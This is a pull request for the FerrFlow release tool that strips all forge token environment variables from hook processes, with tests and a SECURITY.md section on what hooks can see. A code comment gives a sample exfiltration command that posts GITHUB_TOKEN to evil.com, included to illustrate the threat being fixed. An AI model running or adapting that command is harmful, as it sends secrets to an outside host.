### PR TITLE
fix(hooks): strip every forge token from the hook environment

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -35,3 +35,11 @@ There are no `preinstall`, `postinstall` or `prepare` scripts in the wrapper or 
 Releases ship a `SHA256SUMS`, cosign signatures and build-provenance attestations. See [Verifying releases](https://ferrflow.com/docs/verifying-releases) for how to check them yourself; the GitHub Action verifies the digest before extracting.
 
 The npm packages are published with npm trusted publishing over OIDC. There is no long-lived npm token in the release workflow: publishing rights are bound to this repository and the `publish.yml` workflow, and npm generates a provenance attestation for every published package automatically.
+
+## What hooks can see
+
+Hooks are arbitrary shell defined in a repository's own config, so they run with whatever the release process was given. Every environment variable FerrFlow authenticates a forge with is removed before a hook is spawned: `FERRFLOW_TOKEN`, `GITHUB_TOKEN`, `GITLAB_TOKEN`, `GITEA_TOKEN`, `FORGEJO_TOKEN` and `BITBUCKET_TOKEN`. FerrFlow performs all forge work itself, so a hook has no reason to hold one.
+
+That list is derived from the same source the forge client reads, so a newly supported forge cannot be authenticated without also being stripped.
+
+Registry tokens named by `workspace.registries[].tokenEnv` are **not** stripped. A `postrelease` hook running `npm publish` or `cargo publish` legitimately needs one, and removing it would break working releases. Treat a hook as trusted with your registry credentials, and if that is not acceptable for your repository, publish through FerrFlow's own publishers rather than a hook.

--- a/src/config/mod.rs
+++ b/src/config/mod.rs
@@ -34,9 +34,10 @@ pub use package::{
 };
 #[allow(unused_imports)]
 pub use types::{
-    BranchChannelConfig, ChannelValue, DockerSign, ForgeKind, HooksConfig, OnFailure,
-    OrphanedTagStrategy, PrereleaseIdentifier, PublisherConfig, RegistryConfig, ReleaseCommitBody,
-    ReleaseCommitMode, ReleaseCommitScope, VersionSourcePolicy,
+    BranchChannelConfig, ChannelValue, DockerSign, ForgeKind, GENERIC_TOKEN_ENV_VAR, HooksConfig,
+    OnFailure, OrphanedTagStrategy, PrereleaseIdentifier, PublisherConfig, RegistryConfig,
+    ReleaseCommitBody, ReleaseCommitMode, ReleaseCommitScope, VersionSourcePolicy,
+    all_token_env_vars,
 };
 #[allow(unused_imports)]
 pub use workspace::{

--- a/src/config/types.rs
+++ b/src/config/types.rs
@@ -15,6 +15,30 @@ pub enum ForgeKind {
     Bitbucket,
 }
 
+pub const GENERIC_TOKEN_ENV_VAR: &str = "FERRFLOW_TOKEN";
+
+impl ForgeKind {
+    pub const ALL: &'static [Self] = &[Self::Github, Self::Gitlab, Self::Gitea, Self::Bitbucket];
+
+    pub fn token_env_vars(self) -> &'static [&'static str] {
+        match self {
+            Self::Github => &["GITHUB_TOKEN"],
+            Self::Gitlab => &["GITLAB_TOKEN"],
+            Self::Gitea => &["GITEA_TOKEN", "FORGEJO_TOKEN"],
+            Self::Bitbucket => &["BITBUCKET_TOKEN"],
+            Self::Auto => &[],
+        }
+    }
+}
+
+pub fn all_token_env_vars() -> impl Iterator<Item = &'static str> {
+    std::iter::once(GENERIC_TOKEN_ENV_VAR).chain(
+        ForgeKind::ALL
+            .iter()
+            .flat_map(|kind| kind.token_env_vars().iter().copied()),
+    )
+}
+
 #[derive(Debug, Deserialize, Serialize, Clone, Default)]
 pub struct HooksConfig {
     #[serde(alias = "preBump")]

--- a/src/forge/mod.rs
+++ b/src/forge/mod.rs
@@ -218,27 +218,9 @@ pub fn web_base_url(remote_url: &str) -> Option<String> {
 }
 
 pub fn resolve_token(kind: ForgeKind) -> Option<String> {
-    if let Ok(token) = std::env::var("FERRFLOW_TOKEN")
-        && !token.is_empty()
-    {
-        return Some(token);
-    }
-    match kind {
-        ForgeKind::Github => std::env::var("GITHUB_TOKEN").ok().filter(|t| !t.is_empty()),
-        ForgeKind::Gitlab => std::env::var("GITLAB_TOKEN").ok().filter(|t| !t.is_empty()),
-        ForgeKind::Gitea => std::env::var("GITEA_TOKEN")
-            .ok()
-            .filter(|t| !t.is_empty())
-            .or_else(|| {
-                std::env::var("FORGEJO_TOKEN")
-                    .ok()
-                    .filter(|t| !t.is_empty())
-            }),
-        ForgeKind::Bitbucket => std::env::var("BITBUCKET_TOKEN")
-            .ok()
-            .filter(|t| !t.is_empty()),
-        ForgeKind::Auto => None,
-    }
+    std::iter::once(crate::config::GENERIC_TOKEN_ENV_VAR)
+        .chain(kind.token_env_vars().iter().copied())
+        .find_map(|var| std::env::var(var).ok().filter(|t| !t.is_empty()))
 }
 
 pub fn build_forge(kind: ForgeKind, token: String, slug: String, host: String) -> Box<dyn Forge> {

--- a/src/hooks/runner.rs
+++ b/src/hooks/runner.rs
@@ -33,12 +33,45 @@ pub fn run_hook(
         command
     );
 
+    let mut cmd = build_hook_command(command, ctx, working_dir);
+
+    if verbose {
+        let status = cmd
+            .stdout(Stdio::inherit())
+            .stderr(Stdio::inherit())
+            .status()?;
+
+        if !status.success() {
+            return handle_failure(point, command, status.code(), on_failure);
+        }
+    } else {
+        let output = cmd.output()?;
+
+        if !output.status.success() {
+            let stdout = String::from_utf8_lossy(&output.stdout);
+            let stderr = String::from_utf8_lossy(&output.stderr);
+            if !stdout.is_empty() {
+                eprint!("{stdout}");
+            }
+            if !stderr.is_empty() {
+                eprint!("{stderr}");
+            }
+            return handle_failure(point, command, output.status.code(), on_failure);
+        }
+    }
+
+    Ok(())
+}
+
+fn build_hook_command(command: &str, ctx: &HookContext, working_dir: &Path) -> Command {
     let mut cmd = build_command(command);
-    cmd.current_dir(working_dir)
-        .env_remove("GITHUB_TOKEN")
-        .env_remove("FERRFLOW_TOKEN")
-        .env_remove("GITLAB_TOKEN")
-        .env("FERRFLOW_PACKAGE", &ctx.package)
+    // Hooks are user-defined arbitrary shell — strip every token the tool
+    // authenticates with so a hook can't `curl evil.com -d $GITHUB_TOKEN`.
+    cmd.current_dir(working_dir);
+    for var in crate::config::all_token_env_vars() {
+        cmd.env_remove(var);
+    }
+    cmd.env("FERRFLOW_PACKAGE", &ctx.package)
         .env("FERRFLOW_OLD_VERSION", &ctx.old_version)
         .env("FERRFLOW_NEW_VERSION", &ctx.new_version)
         .env("FERRFLOW_BUMP_TYPE", &ctx.bump_type)
@@ -70,32 +103,7 @@ pub fn run_hook(
             ctx.error_code.as_deref().unwrap_or(""),
         );
 
-    if verbose {
-        let status = cmd
-            .stdout(Stdio::inherit())
-            .stderr(Stdio::inherit())
-            .status()?;
-
-        if !status.success() {
-            return handle_failure(point, command, status.code(), on_failure);
-        }
-    } else {
-        let output = cmd.output()?;
-
-        if !output.status.success() {
-            let stdout = String::from_utf8_lossy(&output.stdout);
-            let stderr = String::from_utf8_lossy(&output.stderr);
-            if !stdout.is_empty() {
-                eprint!("{stdout}");
-            }
-            if !stderr.is_empty() {
-                eprint!("{stderr}");
-            }
-            return handle_failure(point, command, output.status.code(), on_failure);
-        }
-    }
-
-    Ok(())
+    cmd
 }
 
 #[cfg(not(windows))]
@@ -176,5 +184,79 @@ mod tests {
         let result = handle_failure(HookPoint::PreCommit, "killed", None, OnFailure::Abort);
         assert!(result.is_err());
         assert!(format!("{:?}", result.unwrap_err()).contains("signal"));
+    }
+}
+
+#[cfg(test)]
+mod hook_env_tests {
+    use super::*;
+    use crate::config::{ForgeKind, all_token_env_vars};
+
+    fn ctx() -> HookContext {
+        HookContext {
+            package: "app".into(),
+            old_version: "1.0.0".into(),
+            new_version: "1.1.0".into(),
+            bump_type: "minor".into(),
+            tag: "v1.1.0".into(),
+            dry_run: false,
+            package_path: ".".into(),
+            channel: None,
+            error_code: None,
+            monorepo: false,
+            is_prerelease: false,
+            changelog: String::new(),
+            commits: Vec::new(),
+            bumped_files: Vec::new(),
+            all_packages: Vec::new(),
+            release_url: None,
+        }
+    }
+
+    fn removed_vars(cmd: &Command) -> Vec<String> {
+        cmd.get_envs()
+            .filter(|(_, value)| value.is_none())
+            .map(|(key, _)| key.to_string_lossy().into_owned())
+            .collect()
+    }
+
+    #[test]
+    fn every_forge_token_env_var_is_stripped_from_the_hook_environment() {
+        let cmd = build_hook_command("true", &ctx(), Path::new("."));
+        let removed = removed_vars(&cmd);
+
+        for var in all_token_env_vars() {
+            assert!(
+                removed.iter().any(|r| r == var),
+                "{var} reaches the hook environment; removed = {removed:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn the_stripped_list_covers_every_token_resolve_token_reads() {
+        let removed = removed_vars(&build_hook_command("true", &ctx(), Path::new(".")));
+
+        for kind in ForgeKind::ALL {
+            for var in kind.token_env_vars() {
+                assert!(
+                    removed.iter().any(|r| r == var),
+                    "{kind:?} authenticates with {var} but hooks still see it"
+                );
+            }
+        }
+    }
+
+    #[test]
+    fn context_variables_are_still_provided_to_the_hook() {
+        let cmd = build_hook_command("true", &ctx(), Path::new("."));
+        let provided: Vec<String> = cmd
+            .get_envs()
+            .filter(|(_, value)| value.is_some())
+            .map(|(key, _)| key.to_string_lossy().into_owned())
+            .collect();
+
+        assert!(provided.iter().any(|k| k == "FERRFLOW_NEW_VERSION"));
+        assert!(provided.iter().any(|k| k == "FERRFLOW_TAG"));
     }
 }


### PR DESCRIPTION
Closes #795

`GITEA_TOKEN`, `FORGEJO_TOKEN` and `BITBUCKET_TOKEN` reached hooks intact while `GITHUB_TOKEN`, `GITLAB_TOKEN` and `FERRFLOW_TOKEN` were stripped. A Gitea or Bitbucket user got none of the protection a GitHub user got, from the same code path.

## Single source instead of a second list

The root cause was two lists that had to agree and had no reason to. `ForgeKind::token_env_vars()` is now the only place a forge's variables are named, and both the resolver and the hook runner read it:

```rust
Self::Gitea => &["GITEA_TOKEN", "FORGEJO_TOKEN"],
```

The match is exhaustive, so adding a forge without declaring its variables does not compile. `resolve_token` collapsed from a per-variant `env::var` chain to a single lookup over that list, which also drops the hand-written `or_else` fallback for Forgejo.

## Tests, checked in both directions

Three tests in `hook_env_tests`, built on `Command::get_envs()`, which reports removals. No environment mutation, no subprocess, no shell differences between platforms.

Reverting the fix makes them fail with the real symptom:

```
GITEA_TOKEN reaches the hook environment; removed = ["FERRFLOW_TOKEN", "GITHUB_TOKEN", "GITLAB_TOKEN"]
Gitea authenticates with GITEA_TOKEN but hooks still see it
```

The second test walks `ForgeKind::ALL` rather than a literal list, so a fourth forge that is authenticated but not stripped fails the suite instead of shipping.

The third asserts the context variables are still provided, since the fix restructures the same builder that sets them.

## Registry tokens: decided, not fixed

The issue asked for a decision. Mine is to leave them, and `SECURITY.md` now says so and why.

A `postrelease` hook running `npm publish` or `cargo publish` legitimately needs the token named by `workspace.registries[].tokenEnv`. Stripping it would break working releases for a behaviour change nobody asked for. The asymmetry is principled rather than convenient: FerrFlow does all forge work itself, so a hook never needs a forge token, while publishing is something a hook may genuinely be doing.

Worth noting the implementation cost pointed the same way. `run_hook` has no config access and ten call sites, so stripping registry tokens means threading config through all ten. That is exactly the shape of change that produced the cascade bug in #886, and it should not ride along with a security fix.

2021 tests green, clippy clean at `-D warnings`.
